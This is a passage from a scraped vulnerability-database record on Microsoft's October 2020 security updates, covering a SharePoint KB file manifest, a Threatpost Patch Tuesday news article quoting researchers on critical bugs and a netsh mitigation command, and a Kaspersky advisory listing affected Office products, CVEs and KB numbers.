\nsts_spclientnewuxc21a3246bdf5a3aa770903ed6fd493ee| sp-pages.js| | 492959| 11-Sep-20| 05:12 \nsts_spclientnewuxb3b4f7cd0e237860f1b8fdbe1372826e| sp-pages-assembly.js| | 2557688| 11-Sep-20| 05:12 \nsts_spclientnewuxb7c159038749343c1c4b0ec9f2deec4c| sp-pages-core.js| | 59295| 11-Sep-20| 05:12 \nsts_spclientnewuxb3342cfbf53938dec6fdf773f6adeebc| sp-people-webparts-bundle.js| | 163875| 11-Sep-20| 05:12 \nsts_spclientnewuxb501aed454e9ea1b719ba92103130738| sp-planner-webpart-bundle.js| | 3143147| 10-Sep-20| 10:45 \nsts_spclientnewuxea46ce84a74da087564f5d905acd4e56| sp-powerapps-webpart.js| | 24084| 11-Sep-20| 05:12 \nsts_spclientnewux22fad59d46fcfec7745b173cc20fd92d| sp-queryfilter.js| | 141726| 11-Sep-20| 05:12 \nsts_spclientnewuxec0d18f646f918f9cae4bd08ccdc09ab| sp-quickchart-webpart-bundle.js| | 255118| 11-Sep-20| 05:12 \nsts_spclientnewux0bbc1a9825e04eb5a37f62f2a09d2dbf| sp-quick-links-webpart.js| | 95055| 11-Sep-20| 05:12 \nsts_spclientnewux113384fd2f31fde205b8bf2f79ccdcd3| sp-siteactivity-webpart-bundle.js| | 209211| 11-Sep-20| 05:12 \nsts_spclientnewux2f7f2f92075f659c5926320cfab3f096| sp-sitepicker.js| | 44819| 11-Sep-20| 05:12 \nsts_spclientnewux6c3d8d275dd7351021418bffbebe3d8c| sp-spacer-webpart-bundle.js| | 44319| 11-Sep-20| 05:12 \nsts_spclientnewuxf5437647b691243399470c6a80d66804| sp-title-region-webpart.js| | 129204| 11-Sep-20| 05:12 \nsts_spclientnewuxb200a6283a80b8a6b4ee220419563723| sp-toolbox.js| | 31030| 11-Sep-20| 05:12 \nsts_spclientnewux3436740e82f30185ab432f7dbe7eed84| sp-twitter-webpart-bundle.js| | 44259| 11-Sep-20| 05:12 \nsts_spclientnewux084c8b925815606929921fa578f05539| sp-webpart-application-assembly.js| | 1522271| 11-Sep-20| 05:12 \nsts_spclientnewuxf9d542f5e7a1ffba716f8cf63efa490b| sp-webpart-base.js| | 106452| 11-Sep-20| 05:12 \nsts_spclientnewux1113dc0b40c4f62ba0b2c0cbbc272713| sp-webpart-shared.js| | 151404| 11-Sep-20| 05:12 \nsts_spclientnewuxf6f4d7aff6b346521ef692276ec4c4c6| sp-webpart-workbench.js| | 51898| 11-Sep-20| 05:12 \nsts_spclientnewux96fbeacb80b41e044617bbe3fade4c6c| sp-webpart-workbench-assembly.js| | 1916977| 11-Sep-20| 05:12 \nsts_spclientnewuxb936577a0b035ab65bc7e49bd5e6a9ab| sp-yammerembed-webpart-bundle.js| | 144166| 11-Sep-20| 05:12 \nsts_spclientnewux80dae808de3b5078b4efc4fb29865793| e377ea37-9047-43b9-8cdb-a761be2f8e09.json| | 13427| 11-Sep-20| 05:12 \nsts_spclientnewuxab7b1df6c15b0a294a30492e9ac8fae1| eb95c819-ab8f-4689-bd03-0c2d65d47b1f.json| | 14590| 11-Sep-20| 05:12 \nsts_spclientnewux8ef36081a346aba067e958bbb3d5a845| f6fdf4f8-4a24-437b-a127-32e66a5dd9b4.json| | 13416| 11-Sep-20| 05:12 \nsts_spclientnewuxcb869d957d4e64318530b63e610d75f7| f92bf067-bc19-489e-a556-7fe95f508720.json| | 18015| 11-Sep-20| 05:12 \nsts_spclientnewux2e8f0649b2b51d464fb6d12bb368a21f| spclientmanifests.json| | 842362| 11-Sep-20| 05:13 \nsts_spclientnewuxcdd2fade97e6bd1c609dafc0204d0272| office-ui-fabric-react-bundle.js| | 548871| 11-Sep-20| 05:13 \nsts_spclientnewux7ffed58434bba18019f8dc25a6921a4f| sp-a11y.js| | 18449| 10-Sep-20| 10:46 \nsts_spclientnewuxd06b22027fae659d53ac198990a2bb9a| sp-dragzone.js| | 8397| 11-Sep-20| 05:13 \nsts_spclientnewuxdce4aa0e772fc2b45853242803a8efdf| sp-flex-layout.js| | 6517| 11-Sep-20| 05:13 \nsts_spclientnewux121e8abb46c9ff351343b680014b113b| sp-hero-layout.js| | 20682| 11-Sep-20| 05:13 \nsts_spclientnewuxf915d58a5d7a11c9f0074f6a6b62e431| sp-masonry-layout.js| | 73604| 11-Sep-20| 05:13 \nsts_spclientnewuxa9691f2e24a93a05b2f0aea66ecd2b39| sp-page-context.js| | 24215| 10-Sep-20| 10:46 \nsts_spclientnewux45c199cda8c597c6b22274f4ccd6346b| tab-test-field-customizer.js| | 5718| 11-Sep-20| 05:13 \nsts_sphomenewux47c2f9686e99961bcfa3599f0e14cb26| sharepointhome.json| | 40268| 11-Sep-20| 05:13 \nsts_sphomenewuxc0250aabec4b1e71150a3c5e78e664b7| searchux-main-sphome.js| | 1588525| 10-Sep-20| 10:46 \nsts_sphomenewuxab3efcb3b4702929d33f754cfd563158| searchux-resources.js| | 25528| 10-Sep-20| 10:46 \nsts_sphomenewuxc68fcb315164c60c6aace83a71fcbbe2| sharepointhome.js| | 1555998| 11-Sep-20| 05:13 \nsts_sphomenewux5764a9aadaf922139c9748a2b692c69f| sphome-react.js| | 208322| 10-Sep-20| 10:46 \nsts_sphomenewuxe5fc5d0c85aa24eb1adbac8ec1c9b954| sphome-rx.js| | 66245| 10-Sep-20| 10:46 \nsts_sphomenewux9e081e46518267288e7b11980f7811a4| sphome-signalr.js| | 129912| 10-Sep-20| 10:46 \nsts_sphomenewux4bf88d694ee8449f7f0ea170824568fb| sphome-utilities.js| | 121837| 11-Sep-20| 05:13 \ncui.debug.js| cui.debug.js| | 657986| 15-Sep-20| 12:03 \ncui.js| cui.js| | 364464| 15-Sep-20| 12:03 \nxui.debug.js| xui.debug.js| | 45549| 15-Sep-20| 12:03 \nxui.js| xui.js| | 18952| 15-Sep-20| 12:03 \nwac.word.sword.dll| sword.dll| 16.0.10367.20000| 12659104| 15-Sep-20| 12:05 \nwdsrv.conversion.sword.dll| sword.dll| 16.0.10367.20000| 12659104| 15-Sep-20| 12:05 \nwdsrv.dll| microsoft.office.word.server.dll| 16.0.10367.20000| 376232| 15-Sep-20| 12:04 \nwdsrv.isapi.dll| microsoft.office.word.server.dll| 16.0.10367.20000| 376232| 15-Sep-20| 12:04 \nmicrosoft.office.translationservices.dll| microsoft.office.translationservices.dll| 16.0.10367.20000| 417192| 15-Sep-20| 12:03 \ntranslationqueue.sql| translationqueue.sql| | 53164| 15-Sep-20| 12:03 \ncore.js| core.js| | 646739| 24-Aug-20| 11:27 \nifswfe.dll| microsoft.office.infopath.server.dll| 16.0.10367.20000| 3175336| 15-Sep-20| 12:03 \nifswfepriv.dll| microsoft.office.infopath.server.dll| 16.0.10367.20000| 3175336| 15-Sep-20| 12:03 \noffxml.dll| offxml.dll| 16.0.10367.20000| 412584| 15-Sep-20| 12:02 \n \nInformation about protection and securityProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2019: October 13, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16941", "CVE-2020-16942", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16948", "CVE-2020-16950", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16953"], "modified": "2020-10-13T07:00:00", "id": "KB4486676", "href": "https://support.microsoft.com/en-us/help/4486676", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-14T20:43:08", "description": "Microsoft has pushed out fixes for 87 security vulnerabilities in October \u2013 11 of them critical \u2013 and one of those is potentially wormable.\n\nThere are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up \u2014 and in fact at least one public exploit is already circulating for this group.\n\nThis month\u2019s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, Open Source Software, Exchange Server, Visual Studio, .NET Framework, Microsoft Dynamics, and the Windows Codecs Library.\n\nA full 75 are listed as important, and just one is listed as moderate in severity. None are listed as being under active attack, but the group does include six issues that were known but unpatched before this month\u2019s regularly scheduled updates.\n\n\u201cAs usual, whenever possible, it\u2019s better to prioritize updates against the Windows operating system,\u201d Richard Tsang, senior software engineer at Rapid7, told Threatpost. \u201cComing in at 53 of the 87 vulnerabilities, patching the OS knocks out 60 percent of the vulnerabilities listed, along with over half of the critical RCE vulnerabilities resolved today.\u201d\n\n## **11 Critical Bugs**\n\nOne of the most notable critical bugs, according to researchers, is a remote code-execution (RCE) problem in the TCP/IP stack. That issue ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) allows attackers to execute arbitrary code with elevated privileges using a specially crafted ICMPv6 router advertisement.\n\nMicrosoft gives this bug its highest exploitability rating, meaning attacks in the wild are extremely likely \u2013 and as such, it carries a severity rating of 9.8 out of 10 on the CvSS vulnerability scale. True to the season, it could be an administrator\u2019s horror show.\n\n\u201cIf you\u2019re running an IPv6 network, you know that filtering router advertisements is not a practical workaround,\u201d said Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative (ZDI), in his [Patch Tuesday analysis](<https://www.thezdi.com/blog/2020/10/13/the-october-2020-security-update-review>). \u201cYou should definitely test and deploy this patch as soon as possible.\u201d\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nBharat Jogi, senior manager of vulnerability and threat research at Qualys, said that an exploit for the bug could be self-propagating, worming through infrastructure without user interaction.\n\n\u201cAn attacker can exploit this vulnerability without any authentication, and it is potentially wormable,\u201d he said. \u201cWe expect a proof-of-concept (PoC) for this exploit would be dropped soon, and we highly encourage everyone to fix this vulnerability as soon as possible.\u201d\n\nThreatpost has reached out for more technical details on the wormable aspect of the bug.\n\n\u201cLuckily, if immediate patching isn\u2019t viable due to reboot scheduling, Microsoft provides [PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems,\u201d said Tsang. \u201cThe PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\u201d\n\nAnother of the critical flaws is an RCE bug in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). The bug can be triggered by sending a specially crafted email to a target; and because the Preview Pane is an attack vector, victims don\u2019t need to open the mail to be infected (ZDI already has a proof-of-concept for this). It can also be used in a web-based attack by convincing users to visit a malicious URL hosting triggering content.\n\n\u201cThe specific flaw exists within the parsing of HTML content in an email. The issue results from the lack of proper validation of the length of user-supplied data before copying it to a fixed-length heap-based buffer,\u201d according to Childs. That bug is rated 8.1 on the CvSS scale.\n\nA critical Windows Hyper-V RCE bug ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), 8.8 on the CvSS scale) meanwhile allows an attacker to run a specially crafted program on an affected guest OS to execute arbitrary code on the host OS.\n\nAnd, other critical problems impact the Windows Camera Codec ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>), both 7.8 on the CvSS scale), both resulting from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer.\n\n\u201cIf the current user is logged on with administrative user rights, an attacker could take control of the affected system,\u201d according to Microsoft. \u201cAn attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\u201d\n\nTwo other critical flaws are RCE problems in SharePoint Server ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>) and [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>), both 8.6 on the CvSS scale). They exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\n\u201cIn both cases, the attacker would need to upload a specially crafted SharePoint application package to an affected version of SharePoint to get arbitrary code execution,\u201d explained Childs. \u201cThis can be accomplished by an unprivileged SharePoint user if the server\u2019s configuration allows it.\u201d\n\nTsang added that PoCs are \u201cstarting to flow out in the wild, so bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\u201d\n\nThe remaining critical bugs are RCE issues in Media Foundation Library ([CVE-2020-16915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16915>), rating 7.8); the Base3D rendering engine ([CVE-2020-17003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17003>), rating 7.8); Graphics components ([CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>), rating 7.8); and the Windows Graphics Device Interface (GDI) ([CVE-2020-16911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>), rating 8.8).\n\nRegarding the latter, the vulnerability exists in the way GDI handles objects in memory, according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cSuccessful exploitation could allow an attacker to gain control of the infected system with the same administrative privileges as the victim,\u201d he said, via email. \u201cThis vulnerability could be exploited by either tricking a victim into visiting a compromised website with a specially crafted document or opening a specially crafted document via a phishing attack.\u201d\n\nTsang added, \u201cA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content. Unlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\u201d\n\n## **6 Publicly Known Bugs**\n\nThere are also a half-dozen vulnerabilities that have been unpatched until this month, but which were publicly known.\n\n\u201cPublic disclosure could mean a couple things,\u201d Todd Schell, senior product manager of security at Ivanti told Threatpost. \u201cIt could be that a demonstration of exploit was performed at an event or by a researcher. It could also mean that a PoC code has been made available.\u201d\n\nWhen it comes to these publicly known bugs, a Windows Error Reporting (WER) elevation-of-privilege issue (CVE-2020-16909) stands out, according to Childs, given that bugs in the WER component [were recently reported as being used in the wild](<https://threatpost.com/apt-attack-malware-windows-error-reporting/159861/>) in fileless attacks.\n\n\n\nThe six publicly disclosed bugs. Source: Trend Micro\u2019s ZDI.\n\nAs for the others, two of are EoP bugs, in the Windows Setup component and the Windows Storage VSP Driver; two are information-disclosure problems in the kernel; and one is an information-disclosure issue in .NET Framework.\n\n\u201cThese info-disclosure bugs leak the contents of kernel memory but do not expose any personally identifiable information,\u201d Childs said.\n\nOne of the info-disclosure bugs, [CVE-2020-16938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938>), now has a PoC exploit that was [dropped on Twitter](<https://twitter.com/jonasLyk/status/1316104870987010048>) on Tuesday, by @jonasLyk. He claimed that a \u201crecent update changed the permissions on partitions and volume device objects, granting everybody read access. This means that by opening the device directly you can read the raw data without any [privileges].\u201d\n\nWith exploits emerging already, Schell pointed out that \u201ca public disclosure does mean that threat actors have advanced warning of a vulnerability and this gives them an advantage.\u201d In fact, the [mean time to exploit a vulnerability from the moment of its disclosure is 22 days](<https://www.rand.org/content/dam/rand/pubs/research_reports/RR1700/RR1751/RAND_RR1751.pdf>), according to a research study from the RAND Institute.\n\nOverall, the lighter patch load of 87 fixes is a significant departure from the 110+ patches the software giant has released every month since March.\n\n\u201cSecurity teams are still reeling from efforts around reducing exposure to CVE-2020-1472 (Zerologon), and today\u2019s Patch Tuesday thankfully brings a slightly lightened load of vulnerabilities compared to the previous seven months, with no vulnerabilities currently known to be exploited in the wild,\u201d Jonathan Cran, head of research at Kenna Security, told Threatpost. \u201cThat said, several of the vulnerabilities in today\u2019s update should be treated with a priority due to their usefulness to attackers [the critical bugs in the Win10 IPv6 stack, Outlook and Hyper-V]. These vulnerabilities all fall into the \u2018patch quickly or monitor closely\u2019 bucket.\n\nAlso, some products were notably absent from the fixes list.\n\n\u201cThere are a couple of interesting things this month,\u201d Schell told Threatpost. \u201cThere are no browser vulnerabilities being resolved. At the time of release, Microsoft did not have any CVEs reported against IE or Edge and no listing of the browsers as affected products this month. Not sure I remember the last time that has happened.\u201d\n\nPatch Tuesday rolls out this month as Microsoft launches the preview of [its new update guide](<https://threatpost.com/microsoft-overhauls-security-update-guide/159449/>).\n\n\u201cIt has provided a few nice improvements,\u201d Schell said. \u201cQuick access to more of the risk-focused information can be found in [the vulnerabilities view](<https://msrc.microsoft.com/update-guide/vulnerability>). Columns like \u2018Exploited\u2019 and \u2018Publicly Disclosed\u2019 allow you to sort and view quickly if there are high-risk items.\u201d\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T20:44:01", "type": "threatpost", "title": "October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"], "modified": "2020-10-13T20:44:01", "id": "THREATPOST:779B904F971138531725D1E57FDFF9DD", "href": "https://threatpost.com/october-patch-tuesday-wormable-bug/160044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-06-06T15:23:14", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Office 2013 RT Service Pack 1 \n3D Viewer \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Word 2013 Service Pack 1 (32-bit editions) \nMicrosoft SharePoint Foundation 2010 Service Pack 2 \nMicrosoft Word 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 32-bit editions \nMicrosoft Office Web Apps 2010 Service Pack 2 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2010 Service Pack 2 (64-bit editions) \nMicrosoft Word 2010 Service Pack 2 (32-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft Word 2013 RT Service Pack 1 \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office Online Server \nMicrosoft Word 2016 (32-bit edition) \nMicrosoft Excel 2010 Service Pack 2 (32-bit editions) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Word 2010 Service Pack 2 (64-bit editions) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Excel Web App 2010 Service Pack 2 \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft Word 2016 (64-bit edition) \nMicrosoft SharePoint Server 2010 Service Pack 2 \nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office Web Apps 2013 Service Pack 1 \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office 2019 for Mac \nMicrosoft Office 2016 for Mac \nMicrosoft Outlook 2010 Service Pack 2 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Office 2013 Click-to-Run (C2R) for 64-bit editions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16928](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16928>) \n[CVE-2020-16929](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16929>) \n[CVE-2020-16941](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16941>) \n[CVE-2020-16946](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16946>) \n[CVE-2020-16947](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16947>) \n[CVE-2020-16944](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16944>) \n[CVE-2020-16945](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16945>) \n[CVE-2020-16948](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16948>) \n[CVE-2020-16949](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16949>) \n[CVE-2020-16942](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16942>) \n[CVE-2020-16932](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16932>) \n[CVE-2020-16952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16952>) \n[CVE-2020-16955](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16955>) \n[CVE-2020-16954](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16954>) \n[CVE-2020-16951](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16951>) \n[CVE-2020-16950](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16950>) \n[CVE-2020-16953](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16953>) \n[CVE-2020-16934](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16934>) \n[CVE-2020-16933](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16933>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n[CVE-2020-16957](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16957>) \n[CVE-2020-16930](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16930>) \n[CVE-2020-16931](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16931>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2020-16918](<https://vulners.com/cve/CVE-2020-16918>)9.3Critical \n[CVE-2020-16928](<https://vulners.com/cve/CVE-2020-16928>)6.8High \n[CVE-2020-16929](<https://vulners.com/cve/CVE-2020-16929>)6.8High \n[CVE-2020-16941](<https://vulners.com/cve/CVE-2020-16941>)2.1Warning \n[CVE-2020-16946](<https://vulners.com/cve/CVE-2020-16946>)3.5Warning \n[CVE-2020-16947](<https://vulners.com/cve/CVE-2020-16947>)9.3Critical \n[CVE-2020-16944](<https://vulners.com/cve/CVE-2020-16944>)3.5Warning \n[CVE-2020-16945](<https://vulners.com/cve/CVE-2020-16945>)3.5Warning \n[CVE-2020-16948](<https://vulners.com/cve/CVE-2020-16948>)4.0Warning \n[CVE-2020-16949](<https://vulners.com/cve/CVE-2020-16949>)5.0Critical \n[CVE-2020-16942](<https://vulners.com/cve/CVE-2020-16942>)2.1Warning \n[CVE-2020-16932](<https://vulners.com/cve/CVE-2020-16932>)6.8High \n[CVE-2020-16952](<https://vulners.com/cve/CVE-2020-16952>)6.8High \n[CVE-2020-16955](<https://vulners.com/cve/CVE-2020-16955>)6.8High \n[CVE-2020-16954](<https://vulners.com/cve/CVE-2020-16954>)6.8High \n[CVE-2020-16951](<https://vulners.com/cve/CVE-2020-16951>)6.8High \n[CVE-2020-16950](<https://vulners.com/cve/CVE-2020-16950>)4.3Warning \n[CVE-2020-16953](<https://vulners.com/cve/CVE-2020-16953>)4.0Warning \n[CVE-2020-16934](<https://vulners.com/cve/CVE-2020-16934>)6.8High \n[CVE-2020-16933](<https://vulners.com/cve/CVE-2020-16933>)6.8High \n[CVE-2020-16957](<https://vulners.com/cve/CVE-2020-16957>)9.3Critical \n[CVE-2020-16930](<https://vulners.com/cve/CVE-2020-16930>)6.8High \n[CVE-2020-16931](<https://vulners.com/cve/CVE-2020-16931>)6.8High\n\n### *KB list*:\n[4486682](<http://support.microsoft.com/kb/4486682>) \n[4486678](<http://support.microsoft.com/kb/4486678>) \n[4484417](<http://support.microsoft.com/kb/4484417>) \n[4486676](<http://support.microsoft.com/kb/4486676>) \n[4486694](<http://support.microsoft.com/kb/4486694>) \n[4486707](<http://support.microsoft.com/kb/4486707>) \n[4486701](<http://support.microsoft.com/kb/4486701>) \n[4486687](<http://support.microsoft.com/kb/4486687>) \n[4486708](<http://support.microsoft.com/kb/4486708>) \n[4486677](<http://support.microsoft.com/kb/4486677>) \n[4486674](<http://support.microsoft.com/kb/4486674>) \n[4486688](<http://support.microsoft.com/kb/4486688>) \n[4484524](<http://support.microsoft.com/kb/4484524>) \n[4486663](<http://support.microsoft.com/kb/4486663>) \n[4486689](<http://support.microsoft.com/kb/4486689>) \n[4484531](<http://support.microsoft.com/kb/4484531>) \n[4486700](<http://support.microsoft.com/kb/4486700>) \n[4486679](<http://support.microsoft.com/kb/4486679>) \n[4486695](<http://support.microsoft.com/kb/4486695>) \n[4486703](<http://support.microsoft.com/kb/4486703>) \n[4484435](<http://support.microsoft.com/kb/4484435>) \n[4486692](<http://support.microsoft.com/kb/4486692>) \n[4462175](<http://support.microsoft.com/kb/4462175>) \n[4486671](<http://support.microsoft.com/kb/4486671>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "kaspersky", "title": "KLA11976 Multiple vulnerabilites in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 